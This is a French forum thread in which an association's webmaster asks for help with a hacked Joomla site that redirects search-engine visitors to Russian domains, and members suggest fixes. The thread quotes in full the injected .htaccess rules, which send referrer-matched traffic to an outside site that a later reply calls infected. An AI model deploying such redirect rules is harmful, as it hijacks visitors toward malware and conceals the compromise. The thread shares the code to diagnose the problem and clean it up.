Aller au contenu

piraté ?


Thierry85

Sujets conseillés

Bonjour,

le site de l'asso dont je fais partie : http://www.asf85.fr semble comme piraté ???

En lien direct pas de soucis mais si on passe par google et que l'on recherche asf85.fr par exemple.

le site est dévié vers : -http://kim-vus.ru/in.cgi?4

Au secours, si quelqu'un a une idée merci d'avance de votre aide.

Lien vers le commentaire
Partager sur d’autres sites

Probablement, en effet, via une recherche google normale on est redirigé vers une url russe, par contre, si on refait la meme recherche en désactivant le referer, on arrive bien sur ton site.

Tu as soit un .htaccess qui fait la redirection des visiteurs provenant de google, soit directement dans le code de ton site

Il y a des chance que ta version de joomla ne soit pas a jour

Lien vers le commentaire
Partager sur d’autres sites

Là les liens de Google renvoient sur la page d'accueil de Google. Encore mieux, quand on fait la recherche sur Bing et qu'on suit le lien, on retombe sur la page d'accueil de... Google !

Lien vers le commentaire
Partager sur d’autres sites

J'avance ..mais pas des masses.

Les mises à jour de joomla sont faites chez moi très rapidement... par contre reste le pb des extensions

Alors le fichier .htaccess à la base du site est modifié ... voilà le méchant code:

<IfModule mod_rewrite.c>
RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://plat-tan.ru/in.cgi?4 [R=301,L]

RewriteCond %{HTTP_REFERER}^.* (web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://plat-tan.ru/in.cgi?4 [R=301,L]</IfModule>

Je le supprime, j'en remets un "tout neuf" mais en peu de temps il esr réécrit.

J'ai tenté de supprimer la reecriture des url , retransformer .htacess en htacces.txt , vider le cache ...rien n'y fait... le chat revient il est toujours vivant :/ saleté de russes !

Pour la lenteur , à mon avis ça vient de celeonet.

J'ai 2 hebergements chez eux avec quasiment le meme site et il y a une grosse difference de vitesse

une autre idée ;)

Lien vers le commentaire
Partager sur d’autres sites

Remets un .htaccess propre, et change les permissions en 444, cela évitera qu'il soit changé !

Assure-toi aussi qu'Apache n'ait pas le droit d'écriture à la racine de ton site.

Lien vers le commentaire
Partager sur d’autres sites

Bon, il serait temps que tu fasses quelques choses, car tu risques d'avoir des soucis un peu plus sérieux.

La redirection maintenant renvois vers une page vérolée, le site de l'association a de forte chance d’être déclaré comme site dangereux, et à juste cause.

Et en plus, quand tu tapes l'adresse tu es renvoyé sur Google.

Il va certainement y avoir en prime une perte de positionnement.

Lien vers le commentaire
Partager sur d’autres sites

Veuillez vous connecter pour commenter

Vous pourrez laisser un commentaire après vous êtes connecté.



Connectez-vous maintenant
×
×
  • Créer...